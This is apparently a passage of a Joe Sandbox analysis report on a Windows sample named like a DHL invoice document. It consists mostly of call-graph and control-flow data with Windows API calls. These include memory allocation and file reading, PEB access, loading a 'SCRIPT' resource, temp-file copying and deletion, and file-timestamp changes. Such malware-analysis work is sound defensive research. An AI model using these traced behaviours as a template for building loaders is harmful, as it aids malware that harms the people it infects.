96667 333923 24 API calls 96666->96667 96669 33391c 96667->96669 96668 3338e8 96668->96665 96668->96666 96669->96642 96670->96642 96671->96624 96673 333a13 96672->96673 96674 33393f 96672->96674 96673->96651 96694 336270 96674->96694 96677 373393 LoadStringW 96680 3733ad 96677->96680 96678 33395a 96679 336b57 22 API calls 96678->96679 96681 33396f 96679->96681 96684 33a8c7 22 API calls 96680->96684 96689 333994 ___scrt_fastfail 96680->96689 96682 3733c9 96681->96682 96683 33397c 96681->96683 96686 336350 22 API calls 96682->96686 96683->96680 96685 333986 96683->96685 96684->96689 96699 336350 96685->96699 96688 3733d7 96686->96688 96688->96689 96708 3333c6 96688->96708 96691 3339f9 Shell_NotifyIconW 96689->96691 96691->96673 96692 3733f9 96693 3333c6 22 API calls 96692->96693 96693->96689 96695 34fe0b 22 API calls 96694->96695 96696 
336295 96695->96696 96697 34fddb 22 API calls 96696->96697 96698 33394d 96697->96698 96698->96677 96698->96678 96700 336362 96699->96700 96701 374a51 96699->96701 96717 336373 96700->96717 96727 334a88 22 API calls __fread_nolock 96701->96727 96704 33636e 96704->96689 96705 374a5b 96706 374a67 96705->96706 96707 33a8c7 22 API calls 96705->96707 96707->96706 96709 3730bb 96708->96709 96710 3333dd 96708->96710 96712 34fddb 22 API calls 96709->96712 96733 3333ee 96710->96733 96714 3730c5 _wcslen 96712->96714 96713 3333e8 96713->96692 96715 34fe0b 22 API calls 96714->96715 96716 3730fe __fread_nolock 96715->96716 96718 3363b6 __fread_nolock 96717->96718 96719 336382 96717->96719 96718->96704 96719->96718 96720 374a82 96719->96720 96721 3363a9 96719->96721 96723 34fddb 22 API calls 96720->96723 96728 33a587 96721->96728 96724 374a91 96723->96724 96725 34fe0b 22 API calls 96724->96725 96726 374ac5 __fread_nolock 96725->96726 96727->96705 96729 33a59d 96728->96729 96732 33a598 __fread_nolock 96728->96732 96730 34fe0b 22 API calls 96729->96730 96731 37f80f 96729->96731 96730->96732 96731->96731 96732->96718 96734 3333fe _wcslen 96733->96734 96735 333411 96734->96735 96736 37311d 96734->96736 96737 33a587 22 API calls 96735->96737 96738 34fddb 22 API calls 96736->96738 96739 33341e __fread_nolock 96737->96739 96740 373127 96738->96740 96739->96713 96741 34fe0b 22 API calls 96740->96741 96742 373157 __fread_nolock 96741->96742 96744 3735a4 96743->96744 96745 3338b7 96743->96745 96744->96745 96746 3735ad DestroyIcon 96744->96746 96745->96668 96747 39c874 42 API calls _strftime 96745->96747 96746->96745 96747->96668 96748 33105b 96753 33344d 96748->96753 96750 33106a 96784 3500a3 29 API calls __onexit 96750->96784 96752 331074 96754 33345d __wsopen_s 96753->96754 96755 33a961 22 API calls 96754->96755 96756 333513 96755->96756 96757 333a5a 24 API calls 96756->96757 96758 33351c 96757->96758 96785 333357 96758->96785 96761 3333c6 22 API calls 96762 333535 96761->96762 96763 
33515f 22 API calls 96762->96763 96764 333544 96763->96764 96765 33a961 22 API calls 96764->96765 96766 33354d 96765->96766 96767 33a6c3 22 API calls 96766->96767 96768 333556 RegOpenKeyExW 96767->96768 96769 373176 RegQueryValueExW 96768->96769 96774 333578 96768->96774 96770 373193 96769->96770 96771 37320c RegCloseKey 96769->96771 96772 34fe0b 22 API calls 96770->96772 96771->96774 96783 37321e _wcslen 96771->96783 96773 3731ac 96772->96773 96775 335722 22 API calls 96773->96775 96774->96750 96776 3731b7 RegQueryValueExW 96775->96776 96778 3731d4 96776->96778 96780 3731ee messages 96776->96780 96777 334c6d 22 API calls 96777->96783 96779 336b57 22 API calls 96778->96779 96779->96780 96780->96771 96781 339cb3 22 API calls 96781->96783 96782 33515f 22 API calls 96782->96783 96783->96774 96783->96777 96783->96781 96783->96782 96784->96752 96786 371f50 __wsopen_s 96785->96786 96787 333364 GetFullPathNameW 96786->96787 96788 333386 96787->96788 96789 336b57 22 API calls 96788->96789 96790 3333a4 96789->96790 96790->96761 96791 eaf663 96794 eaf2d8 96791->96794 96793 eaf6af 96807 eacd08 96794->96807 96796 eaf377 96799 eaf3d1 VirtualAlloc 96796->96799 96804 eaf3b5 96796->96804 96805 eaf4d8 CloseHandle 96796->96805 96806 eaf4e8 VirtualFree 96796->96806 96810 eb01e8 GetPEB 96796->96810 96798 eaf3a8 CreateFileW 96798->96796 96798->96804 96800 eaf3f2 ReadFile 96799->96800 96799->96804 96803 eaf410 VirtualAlloc 96800->96803 96800->96804 96801 eaf5d2 96801->96793 96802 eaf5c4 VirtualFree 96802->96801 96803->96796 96803->96804 96804->96801 96804->96802 96805->96796 96806->96796 96812 eb0188 GetPEB 96807->96812 96809 ead393 96809->96796 96811 eb0212 96810->96811 96811->96798 96813 eb01b2 96812->96813 96813->96809 96814 331098 96819 3342de 96814->96819 96818 3310a7 96820 33a961 22 API calls 96819->96820 96821 3342f5 GetVersionExW 96820->96821 96822 336b57 22 API calls 96821->96822 96823 334342 96822->96823 96824 3393b2 22 API calls 96823->96824 96833 334378 96823->96833 96825 
33436c 96824->96825 96827 3337a0 22 API calls 96825->96827 96826 33441b GetCurrentProcess IsWow64Process 96828 334437 96826->96828 96827->96833 96829 373824 GetSystemInfo 96828->96829 96830 33444f LoadLibraryA 96828->96830 96831 334460 GetProcAddress 96830->96831 96832 33449c GetSystemInfo 96830->96832 96831->96832 96835 334470 GetNativeSystemInfo 96831->96835 96836 334476 96832->96836 96833->96826 96834 3737df 96833->96834 96835->96836 96837 33109d 96836->96837 96838 33447a FreeLibrary 96836->96838 96839 3500a3 29 API calls __onexit 96837->96839 96838->96837 96839->96818 96840 3690fa 96841 369107 96840->96841 96844 36911f 96840->96844 96890 35f2d9 20 API calls __dosmaperr 96841->96890 96843 36910c 96891 3627ec 26 API calls _strftime 96843->96891 96846 36917a 96844->96846 96852 369117 96844->96852 96892 36fdc4 21 API calls 2 library calls 96844->96892 96848 35d955 __fread_nolock 26 API calls 96846->96848 96849 369192 96848->96849 96860 368c32 96849->96860 96851 369199 96851->96852 96853 35d955 __fread_nolock 26 API calls 96851->96853 96854 3691c5 96853->96854 96854->96852 96855 35d955 __fread_nolock 26 API calls 96854->96855 96856 3691d3 96855->96856 96856->96852 96857 35d955 __fread_nolock 26 API calls 96856->96857 96858 3691e3 96857->96858 96859 35d955 __fread_nolock 26 API calls 96858->96859 96859->96852 96861 368c3e CallCatchBlock 96860->96861 96862 368c46 96861->96862 96863 368c5e 96861->96863 96894 35f2c6 20 API calls __dosmaperr 96862->96894 96865 368d24 96863->96865 96870 368c97 96863->96870 96901 35f2c6 20 API calls __dosmaperr 96865->96901 96867 368c4b 96895 35f2d9 20 API calls __dosmaperr 96867->96895 96868 368d29 96902 35f2d9 20 API calls __dosmaperr 96868->96902 96872 368ca6 96870->96872 96873 368cbb 96870->96873 96896 35f2c6 20 API calls __dosmaperr 96872->96896 96893 365147 EnterCriticalSection 96873->96893 96875 368cb3 96903 3627ec 26 API calls _strftime 96875->96903 96877 368cc1 96879 368cf2 96877->96879 96880 368cdd 96877->96880 96878 368cab 96897 
35f2d9 20 API calls __dosmaperr 96878->96897 96885 368d45 __fread_nolock 38 API calls 96879->96885 96898 35f2d9 20 API calls __dosmaperr 96880->96898 96882 368c53 __fread_nolock 96882->96851 96887 368ced 96885->96887 96886 368ce2 96899 35f2c6 20 API calls __dosmaperr 96886->96899 96900 368d1c LeaveCriticalSection __wsopen_s 96887->96900 96890->96843 96891->96852 96892->96846 96893->96877 96894->96867 96895->96882 96896->96878 96897->96875 96898->96886 96899->96887 96900->96882 96901->96868 96902->96875 96903->96882 96904 33f7bf 96905 33f7d3 96904->96905 96906 33fcb6 96904->96906 96907 33fcc2 96905->96907 96909 34fddb 22 API calls 96905->96909 96997 33aceb 23 API calls messages 96906->96997 96998 33aceb 23 API calls messages 96907->96998 96911 33f7e5 96909->96911 96911->96907 96912 33f83e 96911->96912 96913 33fd3d 96911->96913 96927 33ed9d messages 96912->96927 96939 341310 96912->96939 96999 3a1155 22 API calls 96913->96999 96916 384beb 97003 3a359c 82 API calls __wsopen_s 96916->97003 96917 34fddb 22 API calls 96921 33ec76 messages 96917->96921 96918 33fef7 96926 33a8c7 22 API calls 96918->96926 96918->96927 96921->96916 96921->96917 96921->96918 96922 384b0b 96921->96922 96923 384600 96921->96923 96921->96927 96928 33a8c7 22 API calls 96921->96928 96931 33a961 22 API calls 96921->96931 96932 33fbe3 96921->96932 96935 350242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96921->96935 96936 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96921->96936 96937 3500a3 29 API calls pre_c_initialization 96921->96937 96938 33f3ae messages 96921->96938 96995 3401e0 235 API calls 2 library calls 96921->96995 96996 3406a0 41 API calls messages 96921->96996 97001 3a359c 82 API calls __wsopen_s 96922->97001 96923->96927 96929 33a8c7 22 API calls 96923->96929 96926->96927 96928->96921 96929->96927 96931->96921 96932->96927 96933 384bdc 96932->96933 96932->96938 97002 3a359c 82 
API calls __wsopen_s 96933->97002 96935->96921 96936->96921 96937->96921 96938->96927 97000 3a359c 82 API calls __wsopen_s 96938->97000 96940 341376 96939->96940 96941 3417b0 96939->96941 96942 341390 96940->96942 96943 386331 96940->96943 97137 350242 5 API calls __Init_thread_wait 96941->97137 97004 341940 96942->97004 97142 3b709c 235 API calls 96943->97142 96947 3417ba 96950 3417fb 96947->96950 96952 339cb3 22 API calls 96947->96952 96949 38633d 96949->96921 96954 386346 96950->96954 96956 34182c 96950->96956 96951 341940 9 API calls 96953 3413b6 96951->96953 96959 3417d4 96952->96959 96953->96950 96955 3413ec 96953->96955 97143 3a359c 82 API calls __wsopen_s 96954->97143 96955->96954 96979 341408 __fread_nolock 96955->96979 97139 33aceb 23 API calls messages 96956->97139 97138 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96959->97138 96960 386369 96960->96921 96961 341839 97140 34d217 235 API calls 96961->97140 96963 38636e 97144 3a359c 82 API calls __wsopen_s 96963->97144 96965 34152f 96967 34153c 96965->96967 96968 3863d1 96965->96968 96970 341940 9 API calls 96967->96970 97146 3b5745 54 API calls _wcslen 96968->97146 96971 341549 96970->96971 96976 341940 9 API calls 96971->96976 96982 3864fa 96971->96982 96972 34fddb 22 API calls 96972->96979 96973 341872 97141 34faeb 23 API calls 96973->97141 96974 34fe0b 22 API calls 96974->96979 96980 341563 96976->96980 96979->96960 96979->96961 96979->96963 96979->96965 96979->96972 96979->96974 96981 3863b2 96979->96981 97112 33ec40 96979->97112 96980->96982 96984 33a8c7 22 API calls 96980->96984 96986 3415c7 messages 96980->96986 97145 3a359c 82 API calls __wsopen_s 96981->97145 96982->96960 97147 3a359c 82 API calls __wsopen_s 96982->97147 96984->96986 96985 341940 9 API calls 96985->96986 96986->96960 96986->96973 96986->96982 96986->96985 96989 34167b messages 96986->96989 97014 3b958b 96986->97014 97017 39d4ce 96986->97017 97020 3af0ec 96986->97020 97029 3b959f 96986->97029 97032 3a6ef1 
96986->97032 96987 34171d 96987->96921 96989->96987 97136 34ce17 22 API calls messages 96989->97136 96995->96921 96996->96921 96997->96907 96998->96913 96999->96927 97000->96927 97001->96927 97002->96916 97003->96927 97005 341981 97004->97005 97006 34195d 97004->97006 97148 350242 5 API calls __Init_thread_wait 97005->97148 97007 3413a0 97006->97007 97150 350242 5 API calls __Init_thread_wait 97006->97150 97007->96951 97010 34198b 97010->97006 97149 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97010->97149 97011 348727 97011->97007 97151 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97011->97151 97152 3b7f59 97014->97152 97016 3b959b 97016->96986 97285 39dbbe lstrlenW 97017->97285 97021 337510 53 API calls 97020->97021 97022 3af126 97021->97022 97290 339e90 97022->97290 97024 3af136 97025 3af15b 97024->97025 97026 33ec40 235 API calls 97024->97026 97028 3af15f 97025->97028 97318 339c6e 22 API calls 97025->97318 97026->97025 97028->96986 97030 3b7f59 120 API calls 97029->97030 97031 3b95af 97030->97031 97031->96986 97033 33a961 22 API calls 97032->97033 97034 3a6f1d 97033->97034 97035 33a961 22 API calls 97034->97035 97036 3a6f26 97035->97036 97037 3a6f3a 97036->97037 97479 33b567 39 API calls 97036->97479 97039 337510 53 API calls 97037->97039 97040 3a6f57 _wcslen 97039->97040 97041 3a70bf 97040->97041 97042 3a6fbc 97040->97042 97111 3a70e9 97040->97111 97044 334ecb 94 API calls 97041->97044 97043 337510 53 API calls 97042->97043 97045 3a6fc8 97043->97045 97046 3a70d0 97044->97046 97050 33a8c7 22 API calls 97045->97050 97053 3a6fdb 97045->97053 97047 3a70e5 97046->97047 97048 334ecb 94 API calls 97046->97048 97049 33a961 22 API calls 97047->97049 97047->97111 97048->97047 97051 3a711a 97049->97051 97050->97053 97052 33a961 22 API calls 97051->97052 97057 3a7126 97052->97057 97054 3a7027 97053->97054 97055 3a7005 97053->97055 97058 33a8c7 22 API calls 97053->97058 97056 337510 53 API calls 97054->97056 97059 3333c6 22 
API calls 97055->97059 97060 3a7034 97056->97060 97061 33a961 22 API calls 97057->97061 97058->97055 97062 3a700f 97059->97062 97063 3a703d 97060->97063 97064 3a7047 97060->97064 97065 3a712f 97061->97065 97066 337510 53 API calls 97062->97066 97067 33a8c7 22 API calls 97063->97067 97480 39e199 GetFileAttributesW 97064->97480 97069 33a961 22 API calls 97065->97069 97071 3a701b 97066->97071 97067->97064 97070 3a7138 97069->97070 97074 337510 53 API calls 97070->97074 97075 336350 22 API calls 97071->97075 97072 3a7050 97073 3a7063 97072->97073 97076 334c6d 22 API calls 97072->97076 97078 337510 53 API calls 97073->97078 97084 3a7069 97073->97084 97077 3a7145 97074->97077 97075->97054 97076->97073 97328 33525f 97077->97328 97080 3a70a0 97078->97080 97481 39d076 57 API calls 97080->97481 97081 3a7166 97083 334c6d 22 API calls 97081->97083 97085 3a7175 97083->97085 97084->97111 97086 3a71a9 97085->97086 97087 334c6d 22 API calls 97085->97087 97088 33a8c7 22 API calls 97086->97088 97090 3a7186 97087->97090 97089 3a71ba 97088->97089 97091 336350 22 API calls 97089->97091 97090->97086 97093 336b57 22 API calls 97090->97093 97092 3a71c8 97091->97092 97094 336350 22 API calls 97092->97094 97095 3a719b 97093->97095 97096 3a71d6 97094->97096 97097 336b57 22 API calls 97095->97097 97098 336350 22 API calls 97096->97098 97097->97086 97099 3a71e4 97098->97099 97100 337510 53 API calls 97099->97100 97101 3a71f0 97100->97101 97370 39d7bc 97101->97370 97103 3a7201 97104 39d4ce 4 API calls 97103->97104 97105 3a720b 97104->97105 97106 337510 53 API calls 97105->97106 97109 3a7239 97105->97109 97107 3a7229 97106->97107 97424 3a2947 97107->97424 97110 334f39 68 API calls 97109->97110 97110->97111 97111->96986 97121 33ec76 messages 97112->97121 97113 350242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97113->97121 97114 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97114->97121 97115 
384beb 97496 3a359c 82 API calls __wsopen_s 97115->97496 97116 34fddb 22 API calls 97116->97121 97117 33fef7 97125 33a8c7 22 API calls 97117->97125 97129 33ed9d messages 97117->97129 97120 384b0b 97494 3a359c 82 API calls __wsopen_s 97120->97494 97121->97113 97121->97114 97121->97115 97121->97116 97121->97117 97121->97120 97122 384600 97121->97122 97126 33a8c7 22 API calls 97121->97126 97121->97129 97130 33fbe3 97121->97130 97131 33a961 22 API calls 97121->97131 97133 3500a3 29 API calls pre_c_initialization 97121->97133 97135 33f3ae messages 97121->97135 97491 3401e0 235 API calls 2 library calls 97121->97491 97492 3406a0 41 API calls messages 97121->97492 97127 33a8c7 22 API calls 97122->97127 97122->97129 97125->97129 97126->97121 97127->97129 97129->96979 97130->97129 97132 384bdc 97130->97132 97130->97135 97131->97121 97495 3a359c 82 API calls __wsopen_s 97132->97495 97133->97121 97135->97129 97493 3a359c 82 API calls __wsopen_s 97135->97493 97136->96989 97137->96947 97138->96950 97139->96961 97140->96973 97141->96973 97142->96949 97143->96960 97144->96960 97145->96960 97146->96980 97147->96960 97148->97010 97149->97006 97150->97011 97151->97007 97190 337510 97152->97190 97156 3b844f 97254 3b8ee4 60 API calls 97156->97254 97159 3b845e 97160 3b846a 97159->97160 97161 3b828f 97159->97161 97178 3b7fd5 messages 97160->97178 97226 3b7e86 97161->97226 97162 337510 53 API calls 97182 3b8049 97162->97182 97167 3b82c8 97241 34fc70 97167->97241 97170 3b82e8 97247 3a359c 82 API calls __wsopen_s 97170->97247 97171 3b8302 97248 3363eb 22 API calls 97171->97248 97174 3b82f3 GetCurrentProcess TerminateProcess 97174->97171 97175 3b8281 97175->97156 97175->97161 97176 3b8311 97249 336a50 22 API calls 97176->97249 97178->97016 97179 3b832a 97189 3b8352 97179->97189 97250 3404f0 22 API calls 97179->97250 97180 3b84c5 97180->97178 97185 3b84d9 FreeLibrary 97180->97185 97182->97162 97182->97175 97182->97178 97245 39417d 22 API calls __fread_nolock 97182->97245 97246 3b851d 42 API 
calls _strftime 97182->97246 97183 3b8341 97251 3b8b7b 75 API calls 97183->97251 97185->97178 97189->97180 97252 3404f0 22 API calls 97189->97252 97253 33aceb 23 API calls messages 97189->97253 97255 3b8b7b 75 API calls 97189->97255 97191 337522 97190->97191 97192 337525 97190->97192 97191->97178 97213 3b8cd3 97191->97213 97193 33755b 97192->97193 97194 33752d 97192->97194 97195 3750f6 97193->97195 97197 33756d 97193->97197 97205 37500f 97193->97205 97256 3551c6 26 API calls 97194->97256 97259 355183 26 API calls 97195->97259 97257 34fb21 51 API calls 97197->97257 97198 33753d 97203 34fddb 22 API calls 97198->97203 97200 37510e 97200->97200 97206 337547 97203->97206 97204 375088 97258 34fb21 51 API calls 97204->97258 97205->97204 97208 34fe0b 22 API calls 97205->97208 97207 339cb3 22 API calls 97206->97207 97207->97191 97209 375058 97208->97209 97210 34fddb 22 API calls 97209->97210 97211 37507f 97210->97211 97212 339cb3 22 API calls 97211->97212 97212->97204 97214 33aec9 22 API calls 97213->97214 97215 3b8cee CharLowerBuffW 97214->97215 97260 398e54 97215->97260 97219 33a961 22 API calls 97220 3b8d2a 97219->97220 97267 336d25 97220->97267 97222 3b8d3e 97223 3393b2 22 API calls 97222->97223 97225 3b8d48 _wcslen 97223->97225 97224 3b8e5e _wcslen 97224->97182 97225->97224 97280 3b851d 42 API calls _strftime 97225->97280 97227 3b7eec 97226->97227 97228 3b7ea1 97226->97228 97232 3b9096 97227->97232 97229 34fe0b 22 API calls 97228->97229 97230 3b7ec3 97229->97230 97230->97227 97231 34fddb 22 API calls 97230->97231 97231->97230 97233 3b92ab messages 97232->97233 97240 3b90ba _strcat _wcslen 97232->97240 97233->97167 97234 33b6b5 39 API calls 97234->97240 97235 33b567 39 API calls 97235->97240 97236 33b38f 39 API calls 97236->97240 97237 337510 53 API calls 97237->97240 97238 35ea0c 21 API calls ___std_exception_copy 97238->97240 97240->97233 97240->97234 97240->97235 97240->97236 97240->97237 97240->97238 97284 39efae 24 API calls _wcslen 97240->97284 97243 34fc85 
97241->97243 97242 34fd1d VirtualProtect 97244 34fceb 97242->97244 97243->97242 97243->97244 97244->97170 97244->97171 97245->97182 97246->97182 97247->97174 97248->97176 97249->97179 97250->97183 97251->97189 97252->97189 97253->97189 97254->97159 97255->97189 97256->97198 97257->97198 97258->97195 97259->97200 97261 398e74 _wcslen 97260->97261 97262 398f63 97261->97262 97265 398ea9 97261->97265 97266 398f68 97261->97266 97262->97219 97262->97225 97265->97262 97281 34ce60 41 API calls 97265->97281 97266->97262 97282 34ce60 41 API calls 97266->97282 97268 336d91 97267->97268 97269 336d34 97267->97269 97270 3393b2 22 API calls 97268->97270 97269->97268 97271 336d3f 97269->97271 97276 336d62 __fread_nolock 97270->97276 97272 336d5a 97271->97272 97273 374c9d 97271->97273 97283 336f34 22 API calls 97272->97283 97275 34fddb 22 API calls 97273->97275 97277 374ca7 97275->97277 97276->97222 97278 34fe0b 22 API calls 97277->97278 97279 374cda 97278->97279 97280->97224 97281->97265 97282->97266 97283->97276 97284->97240 97286 39dbdc GetFileAttributesW 97285->97286 97287 39d4d5 97285->97287 97286->97287 97288 39dbe8 FindFirstFileW 97286->97288 97287->96986 97288->97287 97289 39dbf9 FindClose 97288->97289 97289->97287 97291 336270 22 API calls 97290->97291 97316 339eb5 97291->97316 97292 339fd2 97320 33a4a1 22 API calls __fread_nolock 97292->97320 97294 339fec 97294->97024 97297 37f7c4 97325 3996e2 84 API calls __wsopen_s 97297->97325 97298 37f699 97305 34fddb 22 API calls 97298->97305 97300 33a405 97300->97294 97327 3996e2 84 API calls __wsopen_s 97300->97327 97303 33a6c3 22 API calls 97303->97316 97304 37f7d2 97326 33a4a1 22 API calls __fread_nolock 97304->97326 97306 37f754 97305->97306 97309 34fe0b 22 API calls 97306->97309 97308 37f7e8 97308->97294 97310 33a12c __fread_nolock 97309->97310 97310->97297 97310->97300 97312 33a587 22 API calls 97312->97316 97313 33aec9 22 API calls 97314 33a0db CharUpperBuffW 97313->97314 97321 33a673 22 API calls 97314->97321 97316->97292 
97316->97297 97316->97298 97316->97300 97316->97303 97316->97310 97316->97312 97316->97313 97317 33a4a1 22 API calls 97316->97317 97319 334573 41 API calls _wcslen 97316->97319 97322 3348c8 23 API calls 97316->97322 97323 3349bd 22 API calls __fread_nolock 97316->97323 97324 33a673 22 API calls 97316->97324 97317->97316 97318->97028 97319->97316 97320->97294 97321->97316 97322->97316 97323->97316 97324->97316 97325->97304 97326->97308 97327->97294 97329 33a961 22 API calls 97328->97329 97330 335275 97329->97330 97331 33a961 22 API calls 97330->97331 97332 33527d 97331->97332 97333 33a961 22 API calls 97332->97333 97334 335285 97333->97334 97335 33a961 22 API calls 97334->97335 97336 33528d 97335->97336 97337 373df5 97336->97337 97338 3352c1 97336->97338 97339 33a8c7 22 API calls 97337->97339 97340 336d25 22 API calls 97338->97340 97342 373dfe 97339->97342 97341 3352cf 97340->97341 97343 3393b2 22 API calls 97341->97343 97344 33a6c3 22 API calls 97342->97344 97345 3352d9 97343->97345 97346 335304 97344->97346 97345->97346 97347 336d25 22 API calls 97345->97347 97348 335349 97346->97348 97349 335325 97346->97349 97366 373e20 97346->97366 97351 3352fa 97347->97351 97350 336d25 22 API calls 97348->97350 97349->97348 97355 334c6d 22 API calls 97349->97355 97352 33535a 97350->97352 97353 3393b2 22 API calls 97351->97353 97354 335370 97352->97354 97359 33a8c7 22 API calls 97352->97359 97353->97346 97358 335384 97354->97358 97362 33a8c7 22 API calls 97354->97362 97356 335332 97355->97356 97356->97348 97361 336d25 22 API calls 97356->97361 97357 336b57 22 API calls 97367 373ee0 97357->97367 97360 33538f 97358->97360 97363 33a8c7 22 API calls 97358->97363 97359->97354 97364 33a8c7 22 API calls 97360->97364 97368 33539a 97360->97368 97361->97348 97362->97358 97363->97360 97364->97368 97365 334c6d 22 API calls 97365->97367 97366->97357 97367->97348 97367->97365 97482 3349bd 22 API calls __fread_nolock 97367->97482 97368->97081 97371 39d7d8 97370->97371 97372 39d7dd 
Call graph (continued; rendered as an interactive graph in the report, the raw node/edge list is omitted here). Nodes are function addresses annotated with their API-call counts, most of them in the image loaded at 0x330000 and a few at 0xeacd08-0xeaf165 (a GetPEB node followed by Sleep). Windows APIs that appear directly on the graph's nodes: GetTempPathW, GetTempFileNameW, CopyFileW, DeleteFileW, CreateFileW, SetFileTime, CloseHandle, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleW, GetStartupInfoW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, InterlockedExchange, GetStdHandle, GetFileType, GetLastError, GetOpenFileNameW, GetLongPathNameW, CharUpperBuffW, GetPEB, Sleep, Shell_NotifyIconW, CreateWindowExW, ShowWindow, SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW, OleInitialize, GetCurrentProcess, DuplicateHandle, CreateThread, RegisterWindowMessageW, PeekMessageW, GetInputState, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, IsDialogMessageW, GetClassLongW, timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, GetExitCodeProcess, WaitForSingleObject, SetEvent, ResetEvent, SystemParametersInfoW. One path visible in the edges runs 3a2b17 -> 3a3017 (GetTempPathW, GetTempFileNameW) -> 3a2b22 ... 3a2c91 (CopyFileW) -> 3a2cb9 (DeleteFileW) -> 3a2fd8 (CreateFileW) -> 3a2fff (SetFileTime, CloseHandle). Another, around 33d7b0/33dbc0/382a00, is a message pump (PeekMessageW, GetInputState, TranslateAcceleratorW, TranslateMessage/DispatchMessageW, IsDialogMessageW, timeGetTime, Sleep) that also polls a child process with GetExitCodeProcess, WaitForSingleObject and CloseHandle.

                                                                                                                        Control-flow Graph
                                                                                                                        Function at 0x3342de (rendered as an interactive graph in the report; the basic-block edge list and the executed/not-executed colouring are omitted here). Blocks that call APIs: 3342de-33434d GetVersionExW (between calls to 33a961 and 336b57); 33441b-334435 GetCurrentProcess, IsWow64Process; 33444f-33445e LoadLibraryA; 334460-33446e GetProcAddress; 334470-334474 GetNativeSystemInfo; 33447a-33447b FreeLibrary; 33449c-3344a6 and 373824-373828 GetSystemInfo. After the IsWow64Process check the code resolves GetNativeSystemInfo from kernel32.dll at run time and falls back to GetSystemInfo when LoadLibraryA or GetProcAddress fails (edges 266->277 and 276->277); this is the usual way for a 32-bit process to learn the real processor architecture under WOW64 while still running where that export is absent.
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0033430D
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        • GetCurrentProcess.KERNEL32(?,003CCB64,00000000,?,?), ref: 00334422
                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00334429
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00334454
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00334466
                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00334474
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0033447B
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 003344A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                        • API String ID: 3290436268-3101561225
                                                                                                                        • Opcode ID: 4d0d03470150862beeac6b7e1cf87356d5eab0abcfba59b1b0ab6dd7f884f421
                                                                                                                        • Instruction ID: 6330e2413d45885af5e8023fbe68d421b5665a6b92e2d8e15fde8dc79b87d354
                                                                                                                        • Opcode Fuzzy Hash: 4d0d03470150862beeac6b7e1cf87356d5eab0abcfba59b1b0ab6dd7f884f421
                                                                                                                        • Instruction Fuzzy Hash: 5FA1B87192A2C0DFE727C76A7EC15957FE87B26300F0894B9E885F3A32D2345914DB29

                                                                                                                        Control-flow Graph
                                                                                                                        Function at 0x3342a2 (rendered as an interactive graph in the report; edge list and executed/not-executed colouring omitted here). The API blocks form one chain: 3342a2-3342ba CreateStreamOnHGlobal -> 3342bc-3342d3 FindResourceExW -> 3735ba-3735c9 LoadResource -> 3735cf-3735dd SizeofResource -> 3735e3-3735ee LockResource -> 3735f4-373612 (no API calls). Each block after the first branches to 3342d9 on failure, and the function exits through 3342da-3342dd on both the failure and success paths.
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003350AA,?,?,00000000,00000000), ref: 003342B2
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003350AA,?,?,00000000,00000000), ref: 003342C9
• LoadResource.KERNEL32(?,00000000,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20), ref: 003735BE
• SizeofResource.KERNEL32(?,00000000,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20), ref: 003735D3
• LockResource.KERNEL32(003350AA,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20,?), ref: 003735E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
